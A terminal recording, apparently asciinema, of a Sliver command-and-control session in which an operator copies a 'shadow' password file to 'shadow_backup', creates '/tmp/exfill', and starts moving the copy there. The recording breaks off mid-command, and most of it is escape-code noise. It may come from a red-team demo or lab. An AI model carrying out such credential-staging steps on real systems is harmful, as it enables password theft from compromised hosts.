"\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[37D\u001b[26C\u001b[133D\u001b[37C\u001b[?25h"] +[20.950326, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.965125, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow sh\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.966512, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[38D\u001b[26C\u001b[133D\u001b[38C\u001b[?25h"] +[21.023234, "o", "\u001b[?25l\u001b[133D"] +[21.025679, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.030401, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow sha\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[21.030652, "o", "\u001b[133D\u001b[1A\u001b[39D\u001b[26C\u001b[133D\u001b[39C\u001b[?25h"] +[21.125176, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.133165, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shad\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[40D\u001b[26C\u001b[133D\u001b[40C\u001b[?25h"] +[21.228201, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.238356, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shado\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[21.240256, "o", "\u001b[133D\u001b[1A\u001b[41D\u001b[26C\u001b[133D\u001b[41C\u001b[?25h"] +[21.384159, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.39554, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.396896, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[42D\u001b[26C\u001b[133D\u001b[42C\u001b[?25h"] +[21.758536, "o", "\u001b[?25l\u001b[133D"] +[21.760078, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.762605, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[43D\u001b[26C\u001b[133D\u001b[43C\u001b[?25h"] +[22.100054, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[22.111512, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[22.112925, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[44D\u001b[26C\u001b[133D\u001b[44C\u001b[?25h"] +[22.243407, "o", "\u001b[?25l"] +[22.246399, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[22.268419, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[22.268669, "o", "\u001b[1A\u001b[45D\u001b[26C\u001b[133D\u001b[45C\u001b[?25h"] +[22.313227, "o", "\u001b[?25l"] +[22.313549, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[22.320429, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_bac\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[22.320678, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[46D\u001b[26C\u001b[133D\u001b[46C\u001b[?25h"] +[22.496379, "o", "\u001b[?25l\u001b[133D"] +[22.500603, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[22.505842, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[47D\u001b[26C\u001b[133D\u001b[47C\u001b[?25h"] +[22.830689, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[22.836046, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_backu\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[22.836562, "o", "\u001b[133D\u001b[1A\u001b[48D\u001b[26C\u001b[133D\u001b[48C\u001b[?25h"] +[23.099235, "o", "\u001b[?25l"] +[23.10164, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[23.106762, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow shadow_backup\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[49D\u001b[26C"] +[23.107571, "o", "\u001b[133D\u001b[49C\u001b[?25h"] +[23.911094, "o", "\u001b[49D\u001b[26C\u001b[6n"] +[23.924583, "o", "\u001b[133D\u001b[49C\u001b[0J\u001b[133D\r\r\n"] +[23.927684, "o", "\u001b[0 q\r\n"] +[24.015938, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mCopied 'shadow' to 'shadow_backup' (501 bytes written)\r\n"] +[24.016972, "o", "\r\n"] +[24.026939, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[24.02705, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[24.027128, "o", "\u001b[6n"] +[24.028429, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[25.268286, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.279921, "o", "m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[25.281212, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[25.37957, "o", "\u001b[?25l"] +[25.380571, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.389185, "o", "mk\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[25.390693, "o", "\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[25.523999, "o", "\u001b[?25l\u001b[133D"] +[25.525229, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.540811, "o", "mkd\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[25.630345, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.638943, "o", "mkdi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[25.640126, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[25.776163, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.787504, "o", "\u001b[1m\u001b[32mmkdir\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[25.789057, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[25.926321, "o", "\u001b[?25l\u001b[133D"] +[25.927986, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.931842, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[25.932848, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[26.726056, "o", "\u001b[?25l"] +[26.726938, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[26.741618, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D"] +[26.743055, "o", "\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[27.034668, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.042397, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/t\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[27.043468, "o", "\u001b[34D\u001b[26C\u001b[133D\u001b[34C\u001b[?25h"] +[27.159955, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.167167, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tm\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[27.168471, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[26C\u001b[133D\u001b[35C\u001b[?25h"] +[27.254058, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.259373, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[27.26158, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[36D\u001b[26C\u001b[133D\u001b[36C\u001b[?25h"] +[27.601187, "o", "\u001b[?25l"] +[27.603613, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.609461, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[37D\u001b[26C\u001b[133D\u001b[37C\u001b[?25h"] +[29.282956, "o", "\u001b[?25l\u001b[133D"] +[29.285053, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.287449, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[38D\u001b[26C"] +[29.287878, "o", "\u001b[133D\u001b[38C\u001b[?25h"] +[29.441026, "o", "\u001b[?25l"] +[29.446631, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.453268, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[39D\u001b[26C\u001b[133D\u001b[39C\u001b[?25h"] +[29.682097, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.691083, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/exf\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[29.692275, "o", "\u001b[133D\u001b[1A\u001b[40D\u001b[26C\u001b[133D\u001b[40C\u001b[?25h"] +[29.796651, "o", "\u001b[?25l"] +[29.797168, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.801776, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/exfi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[29.802577, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[41D\u001b[26C\u001b[133D\u001b[41C\u001b[?25h"] +[29.871912, "o", "\u001b[?25l\u001b[133D"] +[29.872973, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.876179, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/exfil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[29.877121, "o", "\u001b[133D\u001b[1A\u001b[42D\u001b[26C\u001b[133D\u001b[42C\u001b[?25h"] +[30.02913, "o", "\u001b[?25l"] +[30.031356, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.041685, "o", "\u001b[1m\u001b[32mmkdir \u001b[39m\u001b[22m/tmp/exfill\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[30.043057, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[43D\u001b[26C\u001b[133D\u001b[43C\u001b[?25h"] +[30.353009, "o", "\u001b[43D\u001b[26C\u001b[6n"] +[30.363659, "o", "\u001b[133D\u001b[43C\u001b[0J\u001b[133D\r\r\n\u001b[0 q\r\n"] +[30.455974, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/tmp/exfill"] +[30.457597, "o", "\r\n\r\n"] +[30.466566, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[30.467097, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.468653, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[30.469226, "o", "\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[32.522269, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[32.523391, "o", "\u001b[6n"] +[32.525348, "o", "m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[32.525914, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[32.682627, "o", "\u001b[?25l\u001b[133D"] +[32.683392, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[32.689008, "o", "\u001b[1m\u001b[32mmv\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[32.689622, "o", "\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[32.808793, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[32.815585, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[32.996175, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[33.006865, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[33.167442, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[33.171996, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22msh\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.172638, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[33.766405, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[33.767128, "o", "\u001b[6n"] +[33.771217, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22msha\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[33.772282, "o", "\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[33.856893, "o", "\u001b[?25l"] +[33.857558, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[33.85947, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshad\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[33.993169, "o", "\u001b[?25l"] +[33.993551, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[33.998597, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshado\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[33.998983, "o", "\u001b[133D\u001b[1A\u001b[34D\u001b[26C\u001b[133D\u001b[34C\u001b[?25h"] +[34.088678, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[34.090971, "o", "\u001b[6n"] +[34.095672, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[26C\u001b[133D\u001b[35C\u001b[?25h"] +[34.445577, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[34.448063, "o", "\u001b[6n"] +[34.453311, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[36D\u001b[26C"] +[34.455573, "o", "\u001b[133D\u001b[36C\u001b[?25h"] +[34.755302, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[34.76502, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_b\u001b[0m\u001b[0K\u001b[49m\r"] +[34.767234, "o", "\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[37D\u001b[26C\u001b[133D\u001b[37C\u001b[?25h"] +[34.889599, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[34.901173, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_ba\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[34.902552, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[38D\u001b[26C\u001b[133D\u001b[38C\u001b[?25h"] +[34.944248, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[34.947102, "o", "\u001b[6n"] +[34.950687, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[39D\u001b[26C\u001b[133D\u001b[39C\u001b[?25h"] +[35.085118, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[35.096905, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[40D\u001b[26C\u001b[133D\u001b[40C\u001b[?25h"] +[35.376525, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[35.386256, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backu\u001b[0m\u001b[0K\u001b[49m"] +[35.388169, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[41D\u001b[26C\u001b[133D\u001b[41C\u001b[?25h"] +[35.589541, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[35.601421, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[35.60222, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[42D\u001b[26C\u001b[133D\u001b[42C\u001b[?25h"] +[35.767493, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[35.776291, "o", "\u001b[6n"] +[35.78088, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[35.782199, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[43D\u001b[26C\u001b[133D\u001b[43C\u001b[?25h"] +[36.309408, "o", "\u001b[?25l\u001b[133D"] +[36.310628, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[36.322668, "o", "\u001b[6n"] +[36.328249, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[36.333327, "o", "\u001b[133D\u001b[1A\u001b[44D\u001b[26C\u001b[133D\u001b[44C\u001b[?25h"] +[36.772219, "o", "\u001b[?25l\u001b[133D"] +[36.774612, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[36.778211, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /t\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[36.781103, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[45D\u001b[26C\u001b[133D\u001b[45C\u001b[?25h"] +[36.883962, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[36.885394, "o", "\u001b[6n"] +[36.891924, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tm\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[46D\u001b[26C\u001b[133D\u001b[46C\u001b[?25h"] +[36.997958, "o", "\u001b[?25l\u001b[133D"] +[36.999081, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.011652, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[47D\u001b[26C\u001b[133D\u001b[47C\u001b[?25h"] +[37.271585, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.280016, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.281574, "o", "\u001b[133D\u001b[1A\u001b[48D\u001b[26C\u001b[133D\u001b[48C\u001b[?25h"] +[37.425862, "o", "\u001b[?25l"] +[37.427627, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.433523, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.434635, "o", "\u001b[133D\u001b[1A\u001b[49D\u001b[26C\u001b[133D\u001b[49C\u001b[?25h"] +[37.62314, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[37.625102, "o", "\u001b[6n"] +[37.630156, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[50D\u001b[26C"] +[37.631208, "o", "\u001b[133D\u001b[50C\u001b[?25h"] +[37.775858, "o", "\u001b[?25l\u001b[133D"] +[37.777064, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.780473, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[51D\u001b[26C\u001b[133D\u001b[51C\u001b[?25h"] +[37.86508, "o", "\u001b[?25l\u001b[133D"] +[37.867092, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.872967, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[52D\u001b[26C\u001b[133D\u001b[52C\u001b[?25h"] +[38.08217, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[38.082927, "o", "\u001b[6n"] +[38.086663, "o", "\u001b[1m\u001b[32mmv \u001b[39m\u001b[22mshadow_backup /tmp/exill\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[38.088778, "o", 